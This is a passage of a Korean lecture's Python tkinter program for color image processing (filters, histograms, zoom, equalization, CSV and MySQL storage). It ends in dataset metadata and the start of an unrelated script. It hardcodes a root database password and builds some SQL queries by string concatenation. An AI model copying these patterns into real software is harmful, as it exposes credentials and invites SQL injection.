코드, 출력영상 크기 결정 ##\r\n outH = inH;\r\n outW = inW\r\n ###################################\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ########진짜 컴퓨터 비전 알고리즘 ########\r\n MSIZE = 3\r\n mask = [[-1, 0, 0],\r\n [0, 0, 0],\r\n [0, 0, 1]]\r\n\r\n ## 임시 입력영상 메모리 확보 -> Input 메모리 확보를 위한.\r\n tmpInImageV, tmpOutImageV = [], []\r\n tmpInImageV = (malloc(inH + (MSIZE - 1), inW + (MSIZE - 1), 127)) # 127은 중간값 / 마스크에 따라 바깥 처리를 달리한다.\r\n tmpOutImageV = (malloc(outH, outW))\r\n ## 원 입력 ~~> 임시 입력\r\n for i in range(inH):\r\n for k in range(inW):\r\n tmpInImageV[i + MSIZE // 2][k + MSIZE // 2] = inImageHSV[2][i][k] # 바깥 쪽 값 입력\r\n ## 회선연산\r\n for i in range(MSIZE // 2, inH + MSIZE // 2): # 큰 틀이 주가 아니라, 더 안쪽의 값이 inputImage임\r\n for k in range(MSIZE // 2, inW + MSIZE // 2):\r\n # 각 점을 처리\r\n S = 0.0 # S는 누적값\r\n for m in range(0, MSIZE):\r\n for n in range(0, MSIZE):\r\n S += mask[m][n] * tmpInImageV[i + m - MSIZE // 2][k + n - MSIZE // 2]\r\n tmpOutImageV[i - MSIZE // 2][k - MSIZE // 2] = S * 255\r\n ## 127 더하기 -> 선택해서 진행.\r\n for i in range(outH):\r\n for k in range(outW):\r\n tmpOutImageV[i][k] += 127\r\n if tmpOutImageV[i][k] > 255:\r\n tmpOutImageV[i][k] = 255\r\n elif tmpOutImageV[i][k] < 0:\r\n tmpOutImageV[i][k] = 0\r\n\r\n ## HSV --> RGB\r\n for i in range(outH):\r\n for k in range(outW):\r\n if sx <= k <= ex and sy <= i <= ey : # 범위에 포함되면\r\n h, s, v = inImageHSV[0][i][k], inImageHSV[1][i][k], tmpOutImageV[i][k]\r\n r, g, b = colorsys.hsv_to_rgb(h, s, v)\r\n outImage[R][i][k], outImage[G][i][k], outImage[B][i][k] = int(r), int(g), int(b)\r\n else:\r\n outImage[R][i][k], outImage[G][i][k], outImage[B][i][k] = inImage[R][i][k], inImage[G][i][k], inImage[B][i][k]\r\n\r\n displayImageColor()\r\n\r\ndef blurrImageRGB():\r\n global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n ## 중요! 코드, 출력영상 크기 결정 ##\r\n outH = inH;\r\n outW = inW\r\n ###################################\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ########진짜 컴퓨터 비전 알고리즘 ########\r\n MSIZE = 3\r\n mask = [ [1/9, 1/9, 1/9],\r\n [1/9, 1/9, 1/9],\r\n [1/9, 1/9, 1/9] ]\r\n\r\n ## 임시 입력영상 메모리 확보 -> Input 메모리 확보를 위한.\r\n tmpInImage, tmpOutImage = [], []\r\n for _ in range(3):\r\n tmpInImage.append(malloc(inH + (MSIZE - 1), inW + (MSIZE -1), 127)) # 127은 중간값 / 마스크에 따라 바깥 처리를 달리한다.\r\n for _ in range(3):\r\n tmpOutImage.append(malloc(outH, outW))\r\n ## 원 입력 ~~> 임시 입력\r\n for RGB in range(3):\r\n for i in range(inH):\r\n for k in range(inW):\r\n tmpInImage[RGB][i+MSIZE//2][k+MSIZE//2] = inImage[RGB][i][k] # 바깥 쪽 값 입력\r\n ## 회선연산\r\n for RGB in range(3):\r\n for i in range(MSIZE//2, inH + MSIZE//2): # 큰 틀이 주가 아니라, 더 안쪽의 값이 inputImage임\r\n for k in range(MSIZE//2, inW + MSIZE//2):\r\n # 각 점을 처리\r\n S = 0.0# S는 누적값\r\n for m in range(0, MSIZE):\r\n for n in range(0, MSIZE):\r\n S += mask[m][n] * tmpInImage[RGB][i + m - MSIZE//2][k + n - MSIZE//2]\r\n tmpOutImage[RGB][i-MSIZE//2][k-MSIZE//2] = S\r\n for RGB in range(3):\r\n ## 임시 출력 --> 원 출력\r\n for i in range(outH):\r\n for k in range(outW):\r\n value = tmpOutImage[RGB][i][k]\r\n if value > 255:\r\n value = 255\r\n elif value < 0:\r\n value = 0\r\n outImage[RGB][i][k] = int(value)\r\n displayImageColor()\r\ndef addSValuePillow():\r\n global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n global photo\r\n ## 중요! 
코드, 출력영상 크기 결정 ##\r\n value = askfloat(\"\", \"0-1-10\") # 1보다 커지면 채도가 진해지고, ....\r\n photo2 = photo.copy()\r\n photo2 = ImageEnhance.Color(photo2)\r\n photo2 = photo2.enhance(value)\r\n\r\n ## 중요! 코드, 출력영상 크기 결정 ##\r\n outH = inH;\r\n outW = inW\r\n ############메모리 할당################\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n for i in range(outH) :\r\n for k in range(outW) :\r\n r, g, b = photo2.getpixel((k,i)) # (163, 58, 73) 형태로 나옴. jpg이기 때문에 기존 raw와는 다르다.\r\n outImage[R][i][k] = r\r\n outImage[G][i][k] = g\r\n outImage[B][i][k] = b\r\n displayImageColor()\r\n\r\ndef addSValueHSV():\r\n global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n ## 입력 RGB --> 입력 HSV\r\n ## 메모리 확보\r\n inImageHSV = []\r\n for _ in range(3):\r\n inImageHSV.append(malloc(inH, inW))\r\n # RGB -> HSV\r\n for i in range(inH):\r\n for k in range(inW):\r\n r, g, b = inImage[R][i][k], inImage[G][i][k], inImage[B][i][k]\r\n h, s, v = colorsys.rgb_to_hsv(r / 255, g / 255, b / 255)\r\n ## 색상(Hue), 채도(Saturation), 명도(Value)\r\n ## RGB는 0~255까지 받는데, HSV는 0~1.0까지로 받을 수 있음.\r\n inImageHSV[0][i][k], inImageHSV[1][i][k], inImageHSV[2][i][k] = h, s, v\r\n ## h,s,v를 inImageHSV에 저장함.\r\n\r\n ## 중요! 코드, 출력영상 크기 결정 ##\r\n outH = inH;\r\n outW = inW\r\n #####메모리 할당##################\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ####진짜 컴퓨터 비전 알고리즘 #############\r\n value = askfloat(\"\", \"-255-255\")\r\n value /= 255\r\n ## HSV --> RGB\r\n for i in range(outH):\r\n for k in range(outW):\r\n newS = inImageHSV[1][i][k] + value\r\n if newS < 0: #1이 넘어가면 안됨.\r\n newS =0\r\n elif newS > 1.0:\r\n newS = 1.0\r\n h, s, v = inImageHSV[0][i][k], newS, inImageHSV[2][i][k] * 255\r\n r, g, b = colorsys.hsv_to_rgb(h, s, v)\r\n outImage[R][i][k], outImage[G][i][k], outImage[B][i][k] = int(r), int(g), int(b)\r\n displayImageColor()\r\n\r\n\r\n# 이진화(=흑백 칼러? 영상)\r\ndef bwImageColor():\r\n global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n ## 중요! 코드, 출력영상 크기 결정 ##\r\n outH = inH;\r\n outW = inW\r\n ###############메모리 할당####################\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ########진짜 컴퓨터 비전 알고리즘 ########\r\n # avg_RGB[][] 만들기 => inImage[R] inImage[G] inImage[B]를 하나로 통합\r\n avg_RGB = [] # inImage에서 [R], [G], [B]의 평균을 구하기 위함.\r\n avg_RGB = malloc(inH, inW)\r\n for i in range(inH):\r\n for k in range(inW):\r\n avg_RGB[i][k] = (inImage[R][i][k] + inImage[G][i][k] + inImage[B][i][k]) // 3\r\n\r\n # avg_RGB[][]의 평균 계산.\r\n sum = 0\r\n for i in range(inH):\r\n for k in range(inW):\r\n sum += avg_RGB[i][k]\r\n avg = sum // (inH * inW)\r\n\r\n # 이진화 진행 => avg_RGB[][]의 평균 값과 비교\r\n for i in range(inH):\r\n for k in range(inW):\r\n if avg_RGB[i][k] > avg:\r\n outImage[R][i][k] = outImage[G][i][k] = outImage[B][i][k] = 255\r\n else:\r\n outImage[R][i][k] = outImage[G][i][k] = outImage[B][i][k] = 0\r\n\r\n displayImageColor()\r\n\r\n#영상 축소 알고리즘(평균변환)\r\ndef zoomOutImage2Color():\r\n global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n value = askinteger(\"축소\", \"값~~>\", minvalue=2, maxvalue=16) # 최소 1, 최대 255\r\n ## 중요! 
코드, 출력영상 크기 결정 ##\r\n outH = inH//value\r\n outW = inW//value\r\n ###################################\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ########진짜 컴퓨터 비전 알고리즘 ########\r\n for RGB in range(3):\r\n for i in range(inH):\r\n for k in range(inW):\r\n outImage[RGB][i//value][k//value] += inImage[RGB][i][k]\r\n for m in range(outH):\r\n for n in range(outW):\r\n outImage[RGB][m][n] //= (value*value)\r\n displayImageColor()\r\n\r\n# 영상 확대 알고리즘 (양선형 보간) -> 영상 품질을 향상시킬 수 있음.\r\ndef zoomInImage2Color():\r\n global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n value = askinteger(\"확대\", \"값~~>\", minvalue=2, maxvalue=4) # 최소 1, 최대 255\r\n ## 중요! 코드, 출력영상 크기 결정 ##\r\n outH = inH * value\r\n outW = inW * value\r\n ###################################\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ########진짜 컴퓨터 비전 알고리즘 ########\r\n rH, rW, iH, iW = [0] * 4 # 실수위치 및 정수 위치 / real integer\r\n x,y = 0, 0 # 실수와 정수의 차이값\r\n C1,C2,C3,C4 = [0] * 4 # 결정할 위치(N)의 상하좌우 픽셀\r\n for RGB in range(3):\r\n for i in range(outH):\r\n for k in range(outW):\r\n rH = i / value; rW = k / value # 확대하기 때문에 나눠야 함.\r\n iH = int(rH); iW = int(rW) # 나눈 값을 정수로 나타냄.\r\n x = rW - iW; y = rH - iH #\r\n if 0 <= iH < inH-1 and 0 <= iW < inW-1:\r\n C1 = inImage[RGB][iH][iW]\r\n C2 = inImage[RGB][iH][iW + 1]\r\n C3 = inImage[RGB][iH+1][iW+1]\r\n C4 = inImage[RGB][iH+1][iW]\r\n newValue = C1*(1-y)*(1-x) + C2*(1-y)*x + C3*y*x + C4*y*(1-x)\r\n outImage[RGB][i][k] = int(newValue)\r\n displayImageColor()\r\n\r\n\r\n# 히스토그램 -> 영상 그래프를 시각적으로 확인하기 위함.\r\nimport matplotlib.pyplot as plt\r\ndef histoImageColor():\r\n global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n inCountList = [[0] * 256 for _ in range(3)] # 3면이기 때문에 0*256 * 3이 되어야 함.\r\n outCountList = [[0] * 256 for _ in range(3)]\r\n\r\n for RGB in range(3):\r\n for i in range(inH):\r\n for k in range(inW):\r\n inCountList[RGB][inImage[RGB][i][k]] += 1 # inCountList[0], inCountList[1], inCountList[2] 값을 각각 더해줌.\r\n for i in range(outH):\r\n for k in range(outW):\r\n outCountList[RGB][outImage[RGB][i][k]] += 1\r\n\r\n plt.plot(outCountList[R], 'r-')\r\n plt.plot(outCountList[G], 'g-')\r\n plt.plot(outCountList[B], 'b-')\r\n plt.show()\r\n\r\n#히스토그램 -> matplotlib 사용 없이 진행.\r\ndef histoImage2Color():\r\n global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n outCountList = [[0] * 256 for _ in range(3)]\r\n normalCountList = [[0] * 256 for _ in range(3)]\r\n\r\n #빈도수 계산 -> 이어주는 것이 중요. 
minVal[]을 만들 필요가 없음.\r\n    for RGB in range(3):\r\n        for i in range(outH):\r\n            for k in range(outW):\r\n                outCountList[RGB][outImage[RGB][i][k]] += 1\r\n        maxVal = max(outCountList[RGB])\r\n        minVal = min(outCountList[RGB])\r\n        High = 256\r\n        # 정규화 = (카운트 값 - 최소값) * High / (최대값 - 최소값)\r\n        for i in range(len(outCountList[RGB])):\r\n            normalCountList[RGB][i] = (outCountList[RGB][i] - minVal) * High / (maxVal - minVal)\r\n    ## 서브 윈도창 생성 후 출력\r\n    subWindow = Toplevel(window) # 그래프가 3개 나와야 하므로, subWindow에서 가로는 곱하기 3을 해주고, 세로는 그대로 놔둔다.\r\n    subWindow.geometry('%dx%d' %(256*3, 256))\r\n    subCanvas = Canvas(subWindow, width=256*3,height = 256)\r\n    subPaper = PhotoImage(width = 256*3, height = 256)\r\n    subCanvas.create_image((256*3//2, 256//2), image = subPaper, state='normal')\r\n    for RGB in range(3):\r\n        for i in range(len(normalCountList[RGB])): # 255번 돌아감.\r\n            for k in range(int(normalCountList[RGB][i])): # 0 <= normalCountList[i] <= 256\r\n                #data = 0 # data=0으로 해준 이유는 검은색만 나오게 하기 위함.\r\n                if RGB == R: # RGB 값이 0이면\r\n                    subPaper.put('#d62719', (256 * RGB + i, 255 -k))\r\n                elif RGB == G:\r\n                    subPaper.put('#4fc34e', (256 * RGB + i, 255 -k ))\r\n                elif RGB == B:\r\n                    subPaper.put('#1948b4', (256 * RGB + i, 255-k))\r\n    subCanvas.pack(expand=1, anchor = CENTER)\r\n    subWindow.mainloop()\r\n\r\n# 스트레칭 알고리즘\r\ndef stretchImageColor():\r\n    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n    ## 중요! 코드, 출력영상 크기 결정 ##\r\n    outH = inH;\r\n    outW = inW\r\n    ###################################\r\n    outImage = []\r\n    for _ in range(3):\r\n        outImage.append(malloc(outH, outW))\r\n    ########진짜 컴퓨터 비전 알고리즘 ########\r\n    for RGB in range(3):\r\n        maxVal = minVal = inImage[RGB][0][0]\r\n        for i in range(inH):\r\n            for k in range(inW):\r\n                if inImage[RGB][i][k] < minVal:\r\n                    minVal = inImage[RGB][i][k]\r\n                elif inImage[RGB][i][k] > maxVal:\r\n                    maxVal = inImage[RGB][i][k]\r\n        for i in range(inH):\r\n            for k in range(inW):\r\n                outImage[RGB][i][k] = int(((inImage[RGB][i][k] - minVal) / (maxVal - minVal)) * 255)\r\n    displayImageColor()\r\n\r\n#End-in image\r\ndef endinImageColor():\r\n    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n    ## 중요! 코드, 출력영상 크기 결정 ##\r\n    outH = inH;\r\n    outW = inW\r\n    ###################################\r\n    outImage = []\r\n    for _ in range(3):\r\n        outImage.append(malloc(outH, outW))\r\n    ########진짜 컴퓨터 비전 알고리즘 ########\r\n    minAdd = askinteger(\"최소\", \"최소추가~~>\", minvalue=0, maxvalue=255)\r\n    maxAdd = askinteger(\"최대\", \"최소감소~~>\", minvalue=0, maxvalue=255)\r\n\r\n    for RGB in range(3):\r\n        maxVal = minVal = inImage[RGB][0][0]\r\n        for i in range(inH):\r\n            for k in range(inW):\r\n                if inImage[RGB][i][k] < minVal:\r\n                    minVal = inImage[RGB][i][k]\r\n                elif inImage[RGB][i][k] > maxVal:\r\n                    maxVal = inImage[RGB][i][k]\r\n        minVal += minAdd\r\n        maxVal -= maxAdd\r\n        for i in range(inH):\r\n            for k in range(inW):\r\n                value = int((inImage[RGB][i][k] - minVal) / (maxVal - minVal) * 255)\r\n                if value <0:\r\n                    value = 0\r\n                elif value >255:\r\n                    value = 255\r\n                outImage[RGB][i][k] = value\r\n    displayImageColor()\r\n\r\n# 평활화 - 강사님 방법\r\ndef equalizeImageColor():\r\n    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n    ## 중요! 
코드, 출력영상 크기 결정 ##\r\n outH = inH;\r\n outW = inW\r\n ###################################\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ########진짜 컴퓨터 비전 알고리즘 ########\r\n for RGB in range(3):\r\n histo = [0] * 256; sumHisto = [0] * 256; normalHisto =[0] * 256 # RGB값이 바뀔 때 마다, 계속 바뀌는 값\r\n # 1. 빈도 수 조사\r\n for i in range(inH):\r\n for k in range(inW):\r\n histo[inImage[RGB][i][k]] += 1\r\n # 2. 누적 히스토그램 생성\r\n sValue = 0\r\n for i in range(len(histo)):\r\n sValue += histo[i] # 누적 값. 계속 합쳐짐.\r\n sumHisto[i] = sValue\r\n # 3. 정규화 누적 히스토그램\r\n for i in range(len(sumHisto)):\r\n normalHisto[i] = int(sumHisto[i] / (inW * inH) * 255)\r\n ## inW * inH는 총 픽셀 수\r\n # 4. 영상처리\r\n for i in range(inH):\r\n for k in range(inW):\r\n outImage[RGB][i][k] = normalHisto[inImage[RGB][i][k]]\r\n displayImageColor()\r\n\r\n\r\n\r\n## 임시 경로에 outImage를 저장하기.\r\n#-> 이미지를 바로 DB에 넣을 수 없기 때문에 파일로 변환하여 DB에 넣는 과정\r\nimport random\r\nimport struct\r\ndef saveTempImage():\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n import tempfile\r\n saveFp = tempfile.gettempdir() + \"/\" + str(random.randint(10000,99999)) + \".jpg\"\r\n ## .jpg 파일이 겹치지 않도록.\r\n if saveFp == '' or saveFp == None:\r\n return\r\n outArray = []\r\n for i in range(outH):\r\n tmpList = []\r\n for k in range(outW):\r\n tup = tuple([outImage[R][i][k], outImage[G][i][k], outImage[B][i][k],])\r\n tmpList.append(tup)\r\n outArray.append(tmpList)\r\n\r\n outArray = np.array(outArray)\r\n savePhoto = Image.fromarray(outArray.astype(np.uint8), 'RGB')\r\n\r\n savePhoto.save(saveFp)\r\n return saveFp\r\n\r\ndef findStat(fname):\r\n # 파일 열고, 읽기.\r\n fsize = os.path.getsize(fname) # 파일의 크기(바이트)\r\n inH = inW = int(math.sqrt(fsize)) # 핵심 코드\r\n ##입력 영상 메모리 확보##\r\n inImage= []\r\n inImage= malloc(inH, inW)\r\n #파일 --> 메모리\r\n with open(fname, 'rb') as rFp:\r\n for i in range(inH):\r\n for k in range(inW):\r\n inImage[i][k] = int(ord(rFp.read(1)))\r\n sum = 0\r\n for i in range(inH):\r\n for k in range(inW):\r\n sum += inImage[i][k]\r\n avg = sum // (inW * inH)\r\n maxVal = minVal = inImage[0][0]\r\n for i in range(inH):\r\n for k in range(inW):\r\n if inImage[i][k] < minVal:\r\n minVal = inImage[i][k]\r\n elif inImage[i][k] > maxVal:\r\n maxVal = inImage[i][k]\r\n return avg, maxVal, minVal\r\n\r\nimport pymysql\r\nIP_ADDR = '192.168.56.110'; USER_NAME = 'root'; USER_PASS = '1234'\r\nDB_NAME = 'BigData_DB'; CHAR_SET = 'utf8'\r\ndef saveMysqlColor():\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n con = pymysql.connect(host=IP_ADDR, user =USER_NAME, password=USER_PASS,\r\n db = DB_NAME, charset=CHAR_SET)\r\n cur = con.cursor()\r\n try:\r\n sql = '''\r\n CREATE TABLE filenameImage_TBL (\r\n filename_id INT AUTO_INCREMENT PRIMARY KEY,\r\n filename_fname VARCHAR(30),\r\n filename_extname CHAR(5),\r\n filename_height SMALLINT, filename_width SMALLINT,\r\n filename_avg TINYINT UNSIGNED,\r\n filename_max TINYINT UNSIGNED, filename_min TINYINT UNSIGNED,\r\n filename_data LONGBLOB);\r\n '''\r\n ## SMALLINT 는 2바이트 / TINYINT는 1바이트 LONGBLOB은 DB에 파일을 저장해놓는 형식\r\n cur.execute(sql)\r\n except:\r\n pass\r\n\r\n ## outImage를 임시 폴더에 저장하고, 이걸 fullname으로 전달.\r\n fullname = saveTempImage()\r\n print(type(fullname))\r\n with open(fullname, 'rb') as rfp:\r\n binData = rfp.read()\r\n\r\n fname, extname = os.path.basename(fullname).split(\".\")\r\n fsize = os.path.getsize(fullname)\r\n height = width = int(math.sqrt(fsize))\r\n avgVal, maxVal, minValue = findStat(fullname) # 
평균,최대,최소\r\n sql = \"INSERT INTO filenameImage_TBL(filename_id, filename_fname, filename_extname,\"\r\n sql += \"filename_height, filename_width, filename_avg, filename_max, filename_min, filename_data) \"\r\n sql += \" VALUES(NULL,'\" + fname + \"','\" + extname + \"',\"\r\n sql += str(height) + \",\" + str(width) + \",\"\r\n sql += str(avgVal) + \",\" + str(maxVal) + \",\" + str(minValue)\r\n sql += \", %s )\"\r\n tupleData = (binData,)\r\n cur.execute(sql, tupleData)\r\n con.commit()\r\n cur.close()\r\n con.close()\r\n os.remove(fullname)\r\n print(\"업로드 OK -->\" + fullname)\r\n\r\ndef loadMysqlColor():\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n con = pymysql.connect(host=IP_ADDR, user=USER_NAME, password=USER_PASS,\r\n db=DB_NAME, charset=CHAR_SET)\r\n cur = con.cursor()\r\n sql = \"SELECT filename_id, filename_fname, filename_extname, filename_height, filename_width \"\r\n sql += \"FROM filenameImage_TBL\"\r\n cur.execute(sql)\r\n\r\n queryList = cur.fetchall() # 전체 불러오기.\r\n print(queryList)\r\n rowList = [':'.join(map(str,file)) for file in queryList]\r\n import tempfile # C:\\Users\\user\\AppData\\Local\\Temp 로 가도록 하는 라이브러리가 tempfile -> 요기에서 조작.\r\n def selectRecord():\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n selIndex = listbox.curselection()[0] # 0, 1, 2 ... 순으로 나온다.\r\n subWindow.destroy() # 선택을 하면 subWindow 창을 닫는다.\r\n filename_id = queryList[selIndex][0]\r\n sql = \"SELECT filename_fname, filename_extname, filename_data FROM filenameImage_TBL \"\r\n sql += \"WHERE filename_id = \" + str(filename_id)\r\n cur.execute(sql) # 이 줄부터 위 두 줄은 이미지에서 필요한 것들만 가져옴.\r\n fname, extname, binData = cur.fetchone()\r\n print()\r\n fullPath = tempfile.gettempdir() + '/' + fname + \".\" + extname # C:\\Users\\user\\AppData\\Local\\Temp/64319.raw 형태로 저장.\r\n with open(fullPath, 'wb') as wfp: # 이 과정을 진행하지 않으면 펜은 있는데 종이는 없는 느낌. with문 과정이 반드시 필요. 
후에 뒤에서 삭제를 해줘야 함.\r\n            wfp.write(binData) #\r\n        cur.close()\r\n        con.close()\r\n        print(tempfile)\r\n        print(fullPath)\r\n\r\n        loadImageColor(fullPath) # 메모리에 적재만 되었고 equalImage에서 display가 된다.\r\n        equalImageColor()\r\n        os.remove(fullPath) # os.remove 를 진행하지 않으면 Appdata 로컬 안에 있는 임시 파일이 계속 쌓이게 되어, 반드시 제거를 해줘야 한다.\r\n\r\n    ## 서브 윈도에 목록 출력하기\r\n    subWindow = Toplevel(window)\r\n    listbox = Listbox(subWindow)\r\n    button = Button(subWindow, text=\"선택\", command = selectRecord)\r\n\r\n    for rowStr in rowList:\r\n        listbox.insert(END, rowStr)\r\n\r\n    listbox.pack(expand = 1, anchor = CENTER)\r\n    button.pack()\r\n    subWindow.mainloop()\r\n\r\n# 파일을 메모리로 로딩하는 함수\r\ndef loadCSV(fname):\r\n    global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n    fsize = 0\r\n    fp = open(fname, 'r')\r\n    for _ in fp:\r\n        fsize += 1\r\n    inH = inW = int(math.sqrt(fsize)) # 핵심 코드\r\n    fp.close()\r\n    ## 입력영상 메모리 확보 ##\r\n    inImage = []\r\n    for _ in range(3):\r\n        inImage.append(malloc(inH, inW)) # 면을 3개 만든다.\r\n    #파일 --> 메모리\r\n    with open(fname, 'r') as rFp:\r\n        for row_list in rFp:\r\n            row, col, rValue, gValue, bValue = list(map(int, row_list.strip().split(\",\")))\r\n            inImage[R][row][col] = rValue\r\n            inImage[G][row][col] = gValue\r\n            inImage[B][row][col] = bValue\r\n\r\ndef openCSVColor():\r\n    global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n    filename = askopenfilename(parent = window,\r\n                               filetypes=((\"CSV 파일\", \"*.csv\"), (\"모든 파일\", \"*.*\")))\r\n    if filename == '' or filename == None:\r\n        return\r\n    loadCSV(filename)\r\n    equalImageColor()\r\n\r\nimport csv\r\ndef saveCSVColor():\r\n    global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n    saveFp = asksaveasfile(parent=window, mode='wb',\r\n                           defaultextension='*.csv', filetypes=((\"CSV 파일\", \"*.csv\"), (\"모든 파일\", \"*.*\")))\r\n    if saveFp == \"\" or saveFp == None:\r\n        return\r\n    with open(saveFp.name, 'w', newline='') as wFp:\r\n        csvWriter = csv.writer(wFp)\r\n        for i in range(outH):\r\n            for k in range(outW):\r\n                row_list = [i, k, outImage[R][i][k], outImage[G][i][k], outImage[B][i][k]]\r\n                csvWriter.writerow(row_list)\r\n    print(\"CSV.save OK~\")\r\n\r\nimport xlwt\r\ndef saveExcelColor():\r\n    pass\r\n\r\n####################\r\n#### 전역변수 선언부 ####\r\n####################\r\nR, G, B = 0, 1, 2\r\ninImage, outImage = [], [] # 3차원 리스트(배열)\r\ninH, inW, outH, outW = [0] * 4\r\nwindow, canvas, paper = None, None, None\r\nfilename = \"\"\r\nVIEW_X, VIEW_Y = 512, 512 # 화면에 보일 크기 (출력용)\r\n####################\r\n#### 메인 코드부 ####\r\n####################\r\nwindow = Tk()\r\nwindow.geometry(\"500x500\")\r\nwindow.title(\"컴퓨터 비전(딥러닝-칼라) ver 0.1\")\r\n\r\nstatus = Label(window, text='이미지 정보:', bd=1, relief=SUNKEN, anchor=W)\r\nstatus.pack(side=BOTTOM, fill=X)\r\n\r\n## 마우스 이벤트\r\n\r\nmainMenu = Menu(window)\r\nwindow.config(menu=mainMenu)\r\n\r\nfileMenu = Menu(mainMenu)\r\nmainMenu.add_cascade(label=\"파일\", menu=fileMenu)\r\nfileMenu.add_command(label=\"파일 열기\", command=openImageColor)\r\nfileMenu.add_separator()\r\nfileMenu.add_command(label=\"파일 저장\", command=saveImageColor)\r\n\r\ncomVisionMenu1 = Menu(mainMenu)\r\nmainMenu.add_cascade(label=\"화소점 처리\", menu=comVisionMenu1)\r\ncomVisionMenu1.add_command(label=\"덧셈/뺄셈\", command=addImageColor)\r\ncomVisionMenu1.add_command(label=\"반전하기\", command=revImageColor)\r\ncomVisionMenu1.add_command(label=\"파라볼라\", command=paraImageColor)\r\ncomVisionMenu1.add_separator()\r\ncomVisionMenu1.add_command(label=\"모핑\", 
command=morphImageColor)\r\ncomVisionMenu1.add_separator()\r\ncomVisionMenu1.add_command(label=\"채도조절(Pillow)\", command=addSValuePillow)\r\ncomVisionMenu1.add_command(label=\"채도조절(HSV)\", command=addSValueHSV)\r\n\r\ncomVisionMenu2 = Menu(mainMenu)\r\nmainMenu.add_cascade(label=\"통계\", menu=comVisionMenu2)\r\ncomVisionMenu2.add_command(label=\"이진화\", command=bwImageColor)\r\ncomVisionMenu2.add_command(label=\"축소(평균변환)\", command=zoomOutImage2Color)\r\ncomVisionMenu2.add_command(label=\"확대(양선형보간)\", command=zoomInImage2Color)\r\ncomVisionMenu2.add_separator()\r\ncomVisionMenu2.add_command(label=\"히스토그램\", command=histoImageColor)\r\ncomVisionMenu2.add_command(label=\"히스토그램(내꺼)\", command=histoImage2Color)\r\ncomVisionMenu2.add_command(label=\"명암대비\", command=stretchImageColor)\r\ncomVisionMenu2.add_command(label=\"End-In탐색\", command=endinImageColor)\r\ncomVisionMenu2.add_command(label=\"평활화\", command=equalizeImageColor)\r\n\r\ncomVisionMenu3 = Menu(mainMenu)\r\nmainMenu.add_cascade(label=\"기하학 처리\", menu=comVisionMenu3)\r\ncomVisionMenu3.add_command(label=\"상하반전\", command=upDownImageColor)\r\ncomVisionMenu3.add_command(label=\"이동\", command=moveImageColor)\r\ncomVisionMenu3.add_command(label=\"축소\", command=zoomOutImageColor)\r\ncomVisionMenu3.add_command(label=\"확대\", command=zoomInImageColor)\r\ncomVisionMenu3.add_command(label=\"회전1\", command=rotateImageColor)\r\ncomVisionMenu3.add_command(label=\"회전2(중심,역방향)\", command=rotateImage2Color)\r\n\r\ncomVisionMenu4 = Menu(mainMenu)\r\nmainMenu.add_cascade(label=\"화소영역 처리\", menu=comVisionMenu4)\r\ncomVisionMenu4.add_command(label=\"엠보싱(RGB)\", command=embossImageRGB)\r\ncomVisionMenu4.add_command(label=\"엠보싱(Pillow제공)\", command=embossImagePillow)\r\ncomVisionMenu4.add_command(label=\"엠보싱(HSV)\", command=embossImageHSV)\r\ncomVisionMenu4.add_separator()\r\ncomVisionMenu4.add_command(label=\"블러링(RGB)\", command=blurrImageRGB)\r\n\r\ncomVisionMenu5 = Menu(mainMenu)\r\nmainMenu.add_cascade(label=\"기타 입출력\", menu=comVisionMenu5)\r\ncomVisionMenu5.add_command(label=\"MySQL에서 불러오기\", command=loadMysqlColor)\r\ncomVisionMenu5.add_command(label=\"MySQL에 저장하기\", command=saveMysqlColor)\r\ncomVisionMenu5.add_separator()\r\ncomVisionMenu5.add_command(label=\"CSV 열기\", command=openCSVColor)\r\ncomVisionMenu5.add_command(label=\"CSV로 저장\", command=saveCSVColor)\r\ncomVisionMenu5.add_separator()\r\n# comVisionMenu5.add_command(label=\"엑셀 열기\", command=openExcel)\r\ncomVisionMenu5.add_command(label=\"엑셀로 저장\", command=saveExcelColor)\r\n# comVisionMenu5.add_command(label=\"엑셀 아트로 저장\", command=saveExcelArt)\r\n\r\nwindow.mainloop()","sub_path":"강의자료/2019-06-21/Code13-Mission1- Code13-01에서 시작, Code10-05 기반.py","file_name":"Code13-Mission1- Code13-01에서 시작, Code10-05 기반.py","file_ext":"py","file_size_in_byte":49900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"573787601","text":"#!/usr/bin/env /data/mta/Script/Python3.8/envs/ska3-shiny/bin/python\n\n#################################################################################\n# #\n# update_rdb.py: update dataseeker rdb files for ccdm, pacd, mups, and elbi #\n# #\n# author: t. 
